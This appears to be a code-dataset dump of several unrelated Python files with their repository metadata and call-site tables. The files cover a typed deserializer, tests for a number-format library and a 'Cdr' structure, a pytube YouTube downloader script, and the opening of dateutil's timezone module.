return finalize(data)
# Check if it's None (since things like Union[int, Optional[str]] become
# Union[int, str, None] so we end up iterating against it)
if class_reference == type(None) and data is None:
return finalize(None)
if is_union(class_reference):
valid_types = union_types(class_reference, debug_name)
exceptions = []
for valid_type in valid_types:
try:
return finalize(
_deserialize(
valid_type,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
)
except DeserializeException as ex:
exceptions.append(str(ex))
exception_message = (
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}' ->"
)
for exception in exceptions:
exception_lines = exception.split("\n")
sub_message = f"\n\t* {exception_lines[0]}"
for line in exception_lines[1:]:
sub_message += f"\n\t{line}"
exception_message += sub_message
raise DeserializeException(exception_message)
if isinstance(data, dict):
return finalize(
_deserialize_dict(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if isinstance(data, list):
return finalize(
_deserialize_list(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if not is_typing_type(class_reference) and issubclass(class_reference, enum.Enum):
try:
return finalize(class_reference(data))
# pylint:disable=bare-except
except:
enum_by_name = getattr(class_reference, str(data), None)
if enum_by_name:
return finalize(enum_by_name)
# pylint:enable=bare-except
# This will be handled at the end
pass
# If we still have a type from the typing module, we don't know how to
# handle it
if is_typing_type(class_reference):
# The data should not be None if we have a type that got here. Optionals
# are handled by unions above, so if we are here, it's a non-optional
# type and therefore should not be None.
if data is None:
raise DeserializeException(
f"No value for '{debug_name}'. Expected value of type '{class_reference}'"
)
raise DeserializeException(
f"Unsupported deserialization type: {class_reference} for {debug_name}"
)
# Whatever we have left now is either correct, or invalid
if isinstance(data, class_reference):
return finalize(data)
raise DeserializeException(
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}'"
)
# pylint:enable=too-many-return-statements
def _deserialize_list(
class_reference,
list_data,
debug_name,
*,
throw_on_unhandled: bool,
raw_storage_mode: RawStorageMode,
):
if not isinstance(list_data, list):
raise DeserializeException(
f"Cannot deserialize '{type(list_data)}' as a list for {debug_name}."
)
if not is_list(class_reference):
raise DeserializeException(
f"Cannot deserialize a list to '{class_reference}' for {debug_name}"
)
list_content_type_value = list_content_type(class_reference, debug_name)
output = []
for index, item in enumerate(list_data):
deserialized = _deserialize(
list_content_type_value,
item,
f"{debug_name}[{index}]",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
output.append(deserialized)
return output
def _deserialize_dict(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize a dictionary to a Python object."""
# Check if we are doing a straightforward dictionary parse first, or if it
# has to be deserialized
remaining_properties = set(data.keys())
if not isinstance(data, dict):
raise DeserializeException(
f"Data was not dict for instance: {class_reference} for {debug_name}"
)
if is_dict(class_reference):
if class_reference is dict:
# If types of dictionary entries are not defined, do not deserialize
return data
key_type, value_type = dict_content_types(class_reference, debug_name)
result = {}
for dict_key, dict_value in data.items():
if key_type != Any and not isinstance(dict_key, key_type):
raise DeserializeException(
f"Could not deserialize key {dict_key} to type {key_type} for {debug_name}"
)
result[dict_key] = _deserialize(
value_type,
dict_value,
f"{debug_name}.{dict_key}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
remaining_properties.remove(dict_key)
if throw_on_unhandled and len(remaining_properties) > 0:
raise UnhandledFieldException(
f"The following field was unhandled: {list(remaining_properties)[0]} for {debug_name}"
)
return result
# It wasn't a straight forward dictionary, so we are in deserialize mode
class_instance = None
class_reference_downcast_field = _get_downcast_field(class_reference)
if class_reference_downcast_field:
downcast_value = data[class_reference_downcast_field]
new_reference = _get_downcast_class(class_reference, downcast_value)
if new_reference is None:
if _allows_downcast_fallback(class_reference):
return _deserialize(
Dict[Any, Any],
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
raise UndefinedDowncastException(
f"Could not find subclass of {class_reference} with downcast identifier '{downcast_value}' for {debug_name}"
)
class_reference = new_reference
class_instance = class_reference.__new__(class_reference)
handled_fields = set()
hints = typing.get_type_hints(class_reference)
if len(hints) == 0:
raise DeserializeException(
f"Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})"
)
for attribute_name, attribute_type in hints.items():
if _should_ignore(class_reference, attribute_name):
continue
property_key = _get_key(class_reference, attribute_name)
parser_function = _get_parser(class_reference, property_key)
if is_classvar(attribute_type):
if property_key in data:
raise DeserializeException(
f"ClassVars cannot be set: {debug_name}.{attribute_name}"
)
continue
if _uses_auto_snake(class_reference) and attribute_name.lower() != attribute_name:
raise DeserializeException(
f"When using auto_snake, all properties must be snake cased. Error on: {debug_name}.{attribute_name}"
)
using_default = False
if property_key in data:
value = data[property_key]
handled_fields.add(property_key)
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and camel_case(property_key) in data:
value = data[camel_case(property_key)]
handled_fields.add(camel_case(property_key))
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and pascal_case(property_key) in data:
value = data[pascal_case(property_key)]
handled_fields.add(pascal_case(property_key))
property_value = parser_function(value)
else:
if _has_default(class_reference, attribute_name):
deserialized_value = _get_default(class_reference, attribute_name)
using_default = True
else:
if not is_union(attribute_type) or type(None) not in union_types(
attribute_type, debug_name
):
raise DeserializeException(
f"Unexpected missing value for: {debug_name}.{attribute_name}"
)
property_value = parser_function(None)
if not using_default:
deserialized_value = _deserialize(
attribute_type,
property_value,
f"{debug_name}.{attribute_name}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
setattr(class_instance, attribute_name, deserialized_value)
unhandled = set(data.keys()) - handled_fields
if throw_on_unhandled and len(unhandled) > 0:
filtered_unhandled = [
key for key in unhandled if not _should_allow_unhandled(class_reference, key)
]
if len(filtered_unhandled) > 0:
raise UnhandledFieldException(
f"Unhandled field: {list(filtered_unhandled)[0]} for {debug_name}"
)
_call_constructed(class_reference, class_instance)
return class_instance
| [((320, 37, 320, 73), 'deserialize.decorators._get_downcast_field', '_get_downcast_field', ({(320, 57, 320, 72): 'class_reference'}, {}), '(class_reference)', False, 'from deserialize.decorators import downcast_field, _get_downcast_field, downcast_identifier, _get_downcast_class, allow_downcast_fallback, _allows_downcast_fallback\n'), ((342, 12, 342, 50), 'typing.get_type_hints', 'typing.get_type_hints', ({(342, 34, 342, 49): 'class_reference'}, {}), '(class_reference)', False, 'import typing\n'), ((417, 4, 417, 54), 'deserialize.decorators._call_constructed', '_call_constructed', ({(417, 22, 417, 37): 'class_reference', (417, 39, 417, 53): 'class_instance'}, {}), '(class_reference, class_instance)', False, 'from deserialize.decorators import constructed, _call_constructed\n'), ((76, 14, 76, 74), 'deserialize.exceptions.DeserializeException', 'DeserializeException', ({(76, 35, 76, 73): 'f"""Unexpected raw storage mode: {self}"""'}, {}), "(f'Unexpected raw storage mode: {self}')", False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((84, 14, 86, 9), 'deserialize.exceptions.InvalidBaseTypeException', 'InvalidBaseTypeException', ({(85, 12, 85, 78): '"""Only lists and dictionaries are supported as base raw data types"""'}, {}), "(\n 'Only lists and dictionaries are supported as base raw data types')", False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((171, 14, 171, 53), 'deserialize.exceptions.DeserializeException', 'DeserializeException', ({(171, 35, 171, 52): 'exception_message'}, {}), '(exception_message)', False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((218, 14, 220, 9), 'deserialize.exceptions.DeserializeException', 'DeserializeException', ({(219, 12, 219, 83): 'f"""Unsupported deserialization type: {class_reference} for {debug_name}"""'}, {}), "(\n f'Unsupported deserialization type: {class_reference} for {debug_name}')", False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((249, 14, 251, 9), 'deserialize.exceptions.DeserializeException', 'DeserializeException', ({(250, 12, 250, 80): 'f"""Cannot deserialize a list to \'{class_reference}\' for {debug_name}"""'}, {}), '(\n f"Cannot deserialize a list to \'{class_reference}\' for {debug_name}")', False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((281, 14, 283, 9), 'deserialize.exceptions.DeserializeException', 'DeserializeException', ({(282, 12, 282, 81): 'f"""Data was not dict for instance: {class_reference} for {debug_name}"""'}, {}), "(\n f'Data was not dict for instance: {class_reference} for {debug_name}')", False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((323, 24, 323, 76), 'deserialize.decorators._get_downcast_class', '_get_downcast_class', ({(323, 44, 323, 59): 'class_reference', (323, 61, 323, 75): 'downcast_value'}, {}), '(class_reference, downcast_value)', False, 'from deserialize.decorators import downcast_field, _get_downcast_field, downcast_identifier, _get_downcast_class, allow_downcast_fallback, _allows_downcast_fallback\n'), ((345, 14, 347, 9), 'deserialize.exceptions.DeserializeException', 'DeserializeException', ({(346, 12, 346, 107): 'f"""Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})"""'}, {}), "(\n f'Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})'\n )", False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((350, 11, 350, 58), 'deserialize.decorators._should_ignore', '_should_ignore', ({(350, 26, 350, 41): 'class_reference', (350, 43, 350, 57): 'attribute_name'}, {}), '(class_reference, attribute_name)', False, 'from deserialize.decorators import ignore, _should_ignore\n'), ((353, 23, 353, 64), 'deserialize.decorators._get_key', '_get_key', ({(353, 32, 353, 47): 'class_reference', (353, 49, 353, 63): 'attribute_name'}, {}), '(class_reference, attribute_name)', False, 'from deserialize.decorators import key, _get_key\n'), ((354, 26, 354, 68), 'deserialize.decorators._get_parser', '_get_parser', ({(354, 38, 354, 53): 'class_reference', (354, 55, 354, 67): 'property_key'}, {}), '(class_reference, property_key)', False, 'from deserialize.decorators import parser, _get_parser\n'), ((214, 18, 216, 13), 'deserialize.exceptions.DeserializeException', 'DeserializeException', ({(215, 16, 215, 90): 'f"""No value for \'{debug_name}\'. Expected value of type \'{class_reference}\'"""'}, {}), '(\n f"No value for \'{debug_name}\'. Expected value of type \'{class_reference}\'")', False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((325, 15, 325, 57), 'deserialize.decorators._allows_downcast_fallback', '_allows_downcast_fallback', ({(325, 41, 325, 56): 'class_reference'}, {}), '(class_reference)', False, 'from deserialize.decorators import downcast_field, _get_downcast_field, downcast_identifier, _get_downcast_class, allow_downcast_fallback, _allows_downcast_fallback\n'), ((333, 18, 335, 13), 'deserialize.exceptions.UndefinedDowncastException', 'UndefinedDowncastException', ({(334, 16, 334, 124): 'f"""Could not find subclass of {class_reference} with downcast identifier \'{downcast_value}\' for {debug_name}"""'}, {}), '(\n f"Could not find subclass of {class_reference} with downcast identifier \'{downcast_value}\' for {debug_name}"\n )', False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((363, 11, 363, 44), 'deserialize.decorators._uses_auto_snake', '_uses_auto_snake', ({(363, 28, 363, 43): 'class_reference'}, {}), '(class_reference)', False, 'from deserialize.decorators import auto_snake, _uses_auto_snake\n'), ((364, 18, 366, 13), 'deserialize.exceptions.DeserializeException', 'DeserializeException', ({(365, 16, 365, 117): 'f"""When using auto_snake, all properties must be snake cased. Error on: {debug_name}.{attribute_name}"""'}, {}), "(\n f'When using auto_snake, all properties must be snake cased. Error on: {debug_name}.{attribute_name}'\n )", False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((295, 22, 297, 17), 'deserialize.exceptions.DeserializeException', 'DeserializeException', ({(296, 20, 296, 95): 'f"""Could not deserialize key {dict_key} to type {key_type} for {debug_name}"""'}, {}), "(\n f'Could not deserialize key {dict_key} to type {key_type} for {debug_name}'\n )", False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((358, 22, 360, 17), 'deserialize.exceptions.DeserializeException', 'DeserializeException', ({(359, 20, 359, 77): 'f"""ClassVars cannot be set: {debug_name}.{attribute_name}"""'}, {}), "(f'ClassVars cannot be set: {debug_name}.{attribute_name}')", False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((374, 13, 374, 46), 'deserialize.decorators._uses_auto_snake', '_uses_auto_snake', ({(374, 30, 374, 45): 'class_reference'}, {}), '(class_reference)', False, 'from deserialize.decorators import auto_snake, _uses_auto_snake\n'), ((374, 51, 374, 75), 'deserialize.conversions.camel_case', 'camel_case', ({(374, 62, 374, 74): 'property_key'}, {}), '(property_key)', False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((376, 31, 376, 55), 'deserialize.conversions.camel_case', 'camel_case', ({(376, 42, 376, 54): 'property_key'}, {}), '(property_key)', False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((378, 13, 378, 46), 'deserialize.decorators._uses_auto_snake', '_uses_auto_snake', ({(378, 30, 378, 45): 'class_reference'}, {}), '(class_reference)', False, 'from deserialize.decorators import auto_snake, _uses_auto_snake\n'), ((383, 15, 383, 60), 'deserialize.decorators._has_default', '_has_default', ({(383, 28, 383, 43): 'class_reference', (383, 45, 383, 59): 'attribute_name'}, {}), '(class_reference, attribute_name)', False, 'from deserialize.decorators import default, _get_default, _has_default\n'), ((410, 44, 410, 89), 'deserialize.decorators._should_allow_unhandled', '_should_allow_unhandled', ({(410, 68, 410, 83): 'class_reference', (410, 85, 410, 88): 'key'}, {}), '(class_reference, key)', False, 'from deserialize.decorators import allow_unhandled, _should_allow_unhandled\n'), ((375, 25, 375, 49), 'deserialize.conversions.camel_case', 'camel_case', ({(375, 36, 375, 48): 'property_key'}, {}), '(property_key)', False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((378, 51, 378, 76), 'deserialize.conversions.pascal_case', 'pascal_case', ({(378, 63, 378, 75): 'property_key'}, {}), '(property_key)', False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((380, 31, 380, 56), 'deserialize.conversions.pascal_case', 'pascal_case', ({(380, 43, 380, 55): 'property_key'}, {}), '(property_key)', False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((384, 37, 384, 82), 'deserialize.decorators._get_default', '_get_default', ({(384, 50, 384, 65): 'class_reference', (384, 67, 384, 81): 'attribute_name'}, {}), '(class_reference, attribute_name)', False, 'from deserialize.decorators import default, _get_default, _has_default\n'), ((379, 25, 379, 50), 'deserialize.conversions.pascal_case', 'pascal_case', ({(379, 37, 379, 49): 'property_key'}, {}), '(property_key)', False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((390, 26, 392, 21), 'deserialize.exceptions.DeserializeException', 'DeserializeException', ({(391, 24, 391, 86): 'f"""Unexpected missing value for: {debug_name}.{attribute_name}"""'}, {}), "(\n f'Unexpected missing value for: {debug_name}.{attribute_name}')", False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n')] |
snoopyjc/ssf | tests/test_get_set.py | b995cae0e90d38e3758d4944fb144831f9bae0a5 | from ssf import SSF
ssf = SSF(errors='raise')
def test_get_set_days():
dn = ssf.get_day_names()
assert isinstance(dn, tuple)
assert dn == (('Mon', 'Monday'),
('Tue', 'Tuesday'),
('Wed', 'Wednesday'),
('Thu', 'Thursday'),
('Fri', 'Friday'),
('Sat', 'Saturday'),
('Sun', 'Sunday'))
ssf.set_day_names([['MO', 'MON'],
('TU', 'TUE'), ['WE', 'WED'],
('TH', 'THU'), ['FR', 'FRI'],
('SA', 'SAT'), ['SU', 'SUN']])
assert ssf.format('ddd dddd', '10/3/2020') == 'SA SAT'
assert ssf.format('ddd dddd', '10/4/2020') == 'SU SUN'
assert ssf.format('ddd dddd', '10/5/2020') == 'MO MON'
assert ssf.format('ddd dddd', '10/6/2020') == 'TU TUE'
assert ssf.format('ddd dddd', '10/7/2020') == 'WE WED'
assert ssf.format('ddd dddd', '10/8/2020') == 'TH THU'
assert ssf.format('ddd dddd', '10/9/2020') == 'FR FRI'
try:
ssf.set_day_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_day_names((1, 2, 3, 4, 5, 6, 7))
assert False # Failed
except ValueError:
pass
def test_get_set_months():
mn = ssf.get_month_names()
assert isinstance(mn, tuple)
assert mn == (None, ('J', 'Jan', 'January'), ('F', 'Feb', 'February'), ('M', 'Mar', 'March'),
('A', 'Apr', 'April'), ('M', 'May', 'May'), ('J', 'Jun', 'June'), ('J', 'Jul', 'July'),
('A', 'Aug', 'August'), ('S', 'Sep', 'September'), ('O', 'Oct', 'October'),
('N', 'Nov', 'November'), ('D', 'Dec', 'December'))
ssf.set_month_names(mn[:-1] + (('X', 'DE', 'DEC'),) )
assert ssf.format('mmmmm mmm mmmm', '12/3/2020') == 'X DE DEC'
try:
ssf.set_month_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_month_names((0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12))
assert False # Failed
except ValueError:
pass
def test_get_load_table():
t = ssf.get_table()
assert t[0] == 'General'
assert t[1] == '0'
assert t[14] == 'm/d/yyyy'
assert t[49] == '@'
ssf.load_table({104:'yyyy-mm-dd', 105:'0.0'})
assert ssf.format(104, '10/6/2020') == '2020-10-06'
assert ssf.format(105, 3.4) == '3.4'
assert ssf.load('0') == 1
assert ssf.load('mmm mmmm') == 5 # Will be inserted at 5
assert ssf.load('@') == 49
assert ssf.format(5, '10/6/2020') == 'Oct October'
| [((2, 6, 2, 25), 'ssf.SSF', 'SSF', (), '', False, 'from ssf import SSF\n')] |
devppratik/Youtube-Downloader | script.py | ccdf31b83fbce2d05711c64dbad729c935c72b8a | import os
import pyfiglet
from pytube import YouTube, Playlist
file_size = 0
folder_name = ""
# Progress Bar
def print_progress_bar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='#', print_end="\r"):
percent = ("{0:." + str(decimals) + "f}").format(100 *
(iteration / float(total)))
filled_length = int(length * iteration // total)
bar = fill * filled_length + '-' * (length - filled_length)
print(f'\r{prefix} |{bar}| {percent}% {suffix}', end=print_end)
if iteration == total:
print()
# Show Progress Bar
def show_progress_bar(chunk, file_handle, bytes_remaining):
print_progress_bar(file_size - bytes_remaining, file_size, prefix='Progress:', suffix='Complete', length=50)
return
# Get Download Location
def get_download_location():
if os.name == 'nt':
download_location = os.path.join(os.path.expanduser('~'), 'Downloads')
else:
download_location = os.path.join(
os.path.expanduser('~'), 'Downloads')
return download_location
# Get Desired Resolution
def get_resolution(video_url):
yt_obj = YouTube(video_url, on_progress_callback=show_progress_bar)
filters = yt_obj.streams.filter(progressive=True, file_extension='mp4')
print("\nAvailable Resolutions -")
for num, res in enumerate(filters, start=1):
print("\t{}. {}".format(num, str(res.resolution)))
selected_res = int(input('Please enter desired resolution : '))
filters = filters[selected_res - 1]
return filters
# Single Video Download
def download_video():
global file_size
try:
video_url = input('Provide Video Download Link : ')
filters = get_resolution(video_url)
file_size = int(filters.filesize)
download_location = get_download_location()
print("\nDownloading {}".format(str(filters.title)))
filters.download(output_path=download_location)
print("Video Downloaded. Thanks for using!!\nYou can find the video here - {}".format(download_location))
except Exception as e:
print("Some Error occured. Exception message is : ", e)
# Playlist Single Video Download
def download_playlist_video(video_url, res):
global file_size
yt_obj = YouTube(video_url, on_progress_callback=show_progress_bar)
filters = yt_obj.streams.filter(progressive=True, file_extension='mp4', resolution=res).first()
file_size = int(filters.filesize)
if not filters:
filters = yt_obj.streams.filter(
progressive=True, file_extension='mp4').first()
print("\nDownloading {}".format(str(filters.title)))
download_location = get_download_location()
filters.download(output_path="{}/{}".format(download_location, folder_name))
print("Download Complete")
# Playlist Download
def download_playlist():
global folder_name
try:
playlist_url = input('Provide Playlist Link : ')
videos_list = Playlist(playlist_url)
folder_name = videos_list.title
resolution = get_resolution(videos_list[0]).resolution
for video in videos_list:
download_playlist_video(video, resolution)
print("All Videos Downloaded. Thanks for Using!!")
except Exception as e:
print("Some Error occurred. Exception message is : ", e)
# Main Function
def main():
ascii_banner = pyfiglet.figlet_format("YT Downloader")
print(ascii_banner)
print("\t By Pratik Panda\n\n")
choice = int(input(
"""MENU
1.Download Single Video
2.Download Playlist\n
Enter Your Choice : """))
if choice == 1:
download_video()
elif choice == 2:
download_playlist()
else:
print("Wrong Option")
# Start of Program
if __name__ == '__main__':
main()
| [((39, 13, 39, 71), 'pytube.YouTube', 'YouTube', (), '', False, 'from pytube import YouTube, Playlist\n'), ((67, 13, 67, 71), 'pytube.YouTube', 'YouTube', (), '', False, 'from pytube import YouTube, Playlist\n'), ((96, 19, 96, 58), 'pyfiglet.figlet_format', 'pyfiglet.figlet_format', ({(96, 42, 96, 57): '"""YT Downloader"""'}, {}), "('YT Downloader')", False, 'import pyfiglet\n'), ((84, 22, 84, 44), 'pytube.Playlist', 'Playlist', ({(84, 31, 84, 43): 'playlist_url'}, {}), '(playlist_url)', False, 'from pytube import YouTube, Playlist\n'), ((30, 41, 30, 64), 'os.path.expanduser', 'os.path.expanduser', ({(30, 60, 30, 63): '"""~"""'}, {}), "('~')", False, 'import os\n'), ((33, 12, 33, 35), 'os.path.expanduser', 'os.path.expanduser', ({(33, 31, 33, 34): '"""~"""'}, {}), "('~')", False, 'import os\n')] |
alex952/cdr | test/python/test.py | e8dce20c2cc635e5ad8bf16a16ec4f7d9a86ac16 | #
# Copyright 2014-2018 Neueda Ltd.
#
from cdr import Cdr
import unittest
field1 = 1
field2 = 2
field3 = 55
class TestCdr(unittest.TestCase):
def get_a_cdr(self):
d = Cdr()
d.setInteger(field1, 123)
d.setString(field2, "Hello")
d.setString(field3, "World")
return d
def test_set_integer(self):
d = self.get_a_cdr()
self.assertEqual(d.getInt32(field1), 123)
def test_set_string(self):
d = self.get_a_cdr()
d.setString(field2, "Hello")
self.assertEqual(d.getString(field2), "Hello")
def test_get_exception(self):
d = self.get_a_cdr()
with self.assertRaises(RuntimeError):
d.getInteger(4)
def test_to_string(self):
d = Cdr()
d.setInteger(field1, 123)
self.assertEqual(d.toString(), "1=123")
def test_str(self):
d = Cdr()
d.setInteger(field1, 123)
def test_nested(self):
d = Cdr()
e = Cdr()
e.setString(1, "hello")
e.setString(2, "world")
d.appendArray(1, e)
f = d.getArray(1)
self.assertEqual(e.getString(1), f[0].getString(1))
self.assertEqual(e.getString(2), f[0].getString(2))
def test_to_python_dict(self):
d = Cdr()
e = Cdr()
f = Cdr()
f[21] = 400
e[11] = 300
e[12] = [f]
d[1] = 100
d[2] = 200
d[3] = [e]
assert(d.toPythonDict()[3][0][12][0][21] == 400)
if __name__ == '__main__':
unittest.main()
| [((75, 4, 75, 19), 'unittest.main', 'unittest.main', ({}, {}), '()', False, 'import unittest\n'), ((16, 12, 16, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((38, 12, 38, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((43, 12, 43, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((47, 12, 47, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((48, 12, 48, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((58, 12, 58, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((59, 12, 59, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((60, 12, 60, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n')] |
klahnakoski/auth0-api | vendor/mo_times/vendor/dateutil/tz.py | eda9c2554c641da76687f64445b8d35543d012d9 | """
Copyright (c) 2003-2007 Gustavo Niemeyer <[email protected]>
This module offers extensions to the standard Python
datetime module.
"""
import datetime
import os
import struct
import sys
import time
from mo_future import PY3, string_types
__license__ = "Simplified BSD"
__all__ = ["tzutc", "tzoffset", "tzlocal", "tzfile", "tzrange",
"tzstr", "tzical", "tzwin", "tzwinlocal", "gettz"]
relativedelta = None
parser = None
rrule = None
try:
from dateutil.tzwin import tzwin, tzwinlocal
except (ImportError, OSError):
tzwin, tzwinlocal = None, None
def tzname_in_python2(myfunc):
"""Change unicode output into bytestrings in Python 2
tzname() API changed in Python 3. It used to return bytes, but was changed
to unicode strings
"""
def inner_func(*args, **kwargs):
if PY3:
return myfunc(*args, **kwargs)
else:
return myfunc(*args, **kwargs).encode()
return inner_func
ZERO = datetime.timedelta(0)
EPOCHORDINAL = datetime.datetime.utcfromtimestamp(0).toordinal()
class tzutc(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
def dst(self, dt):
return ZERO
@tzname_in_python2
def tzname(self, dt):
return "UTC"
def __eq__(self, other):
return (isinstance(other, tzutc) or
(isinstance(other, tzoffset) and other._offset == ZERO))
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
__reduce__ = object.__reduce__
class tzoffset(datetime.tzinfo):
def __init__(self, name, offset):
self._name = name
self._offset = datetime.timedelta(seconds=offset)
def utcoffset(self, dt):
return self._offset
def dst(self, dt):
return ZERO
@tzname_in_python2
def tzname(self, dt):
return self._name
def __eq__(self, other):
return (isinstance(other, tzoffset) and
self._offset == other._offset)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%s, %s)" % (self.__class__.__name__,
repr(self._name),
self._offset.days*86400+self._offset.seconds)
__reduce__ = object.__reduce__
class tzlocal(datetime.tzinfo):
_std_offset = datetime.timedelta(seconds=-time.timezone)
if time.daylight:
_dst_offset = datetime.timedelta(seconds=-time.altzone)
else:
_dst_offset = _std_offset
def utcoffset(self, dt):
if self._isdst(dt):
return self._dst_offset
else:
return self._std_offset
def dst(self, dt):
if self._isdst(dt):
return self._dst_offset-self._std_offset
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
return time.tzname[self._isdst(dt)]
def _isdst(self, dt):
# We can't use mktime here. It is unstable when deciding if
# the hour near to a change is DST or not.
#
# timestamp = time.mktime((dt.year, dt.month, dt.day, dt.hour,
# dt.minute, dt.second, dt.weekday(), 0, -1))
# return time.localtime(timestamp).tm_isdst
#
# The code above yields the following result:
#
#>>> import tz, datetime
#>>> t = tz.tzlocal()
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRDT'
#>>> datetime.datetime(2003,2,16,0,tzinfo=t).tzname()
#'BRST'
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRST'
#>>> datetime.datetime(2003,2,15,22,tzinfo=t).tzname()
#'BRDT'
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRDT'
#
# Here is a more stable implementation:
#
timestamp = ((dt.toordinal() - EPOCHORDINAL) * 86400
+ dt.hour * 3600
+ dt.minute * 60
+ dt.second)
return time.localtime(timestamp+time.timezone).tm_isdst
def __eq__(self, other):
if not isinstance(other, tzlocal):
return False
return (self._std_offset == other._std_offset and
self._dst_offset == other._dst_offset)
return True
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
__reduce__ = object.__reduce__
class _ttinfo(object):
__slots__ = ["offset", "delta", "isdst", "abbr", "isstd", "isgmt"]
def __init__(self):
for attr in self.__slots__:
setattr(self, attr, None)
def __repr__(self):
l = []
for attr in self.__slots__:
value = getattr(self, attr)
if value is not None:
l.append("%s=%s" % (attr, repr(value)))
return "%s(%s)" % (self.__class__.__name__, ", ".join(l))
def __eq__(self, other):
if not isinstance(other, _ttinfo):
return False
return (self.offset == other.offset and
self.delta == other.delta and
self.isdst == other.isdst and
self.abbr == other.abbr and
self.isstd == other.isstd and
self.isgmt == other.isgmt)
def __ne__(self, other):
return not self.__eq__(other)
def __getstate__(self):
state = {}
for name in self.__slots__:
state[name] = getattr(self, name, None)
return state
def __setstate__(self, state):
for name in self.__slots__:
if name in state:
setattr(self, name, state[name])
class tzfile(datetime.tzinfo):
# http://www.twinsun.com/tz/tz-link.htm
# ftp://ftp.iana.org/tz/tz*.tar.gz
def __init__(self, fileobj):
if isinstance(fileobj, string_types):
self._filename = fileobj
fileobj = open(fileobj, 'rb')
elif hasattr(fileobj, "name"):
self._filename = fileobj.name
else:
self._filename = repr(fileobj)
# From tzfile(5):
#
# The time zone information files used by tzset(3)
# begin with the magic characters "TZif" to identify
# them as time zone information files, followed by
# sixteen bytes reserved for future use, followed by
# six four-byte values of type long, written in a
# ``standard'' byte order (the high-order byte
# of the value is written first).
if fileobj.read(4).decode() != "TZif":
raise ValueError("magic not found")
fileobj.read(16)
(
# The number of UTC/local indicators stored in the file.
ttisgmtcnt,
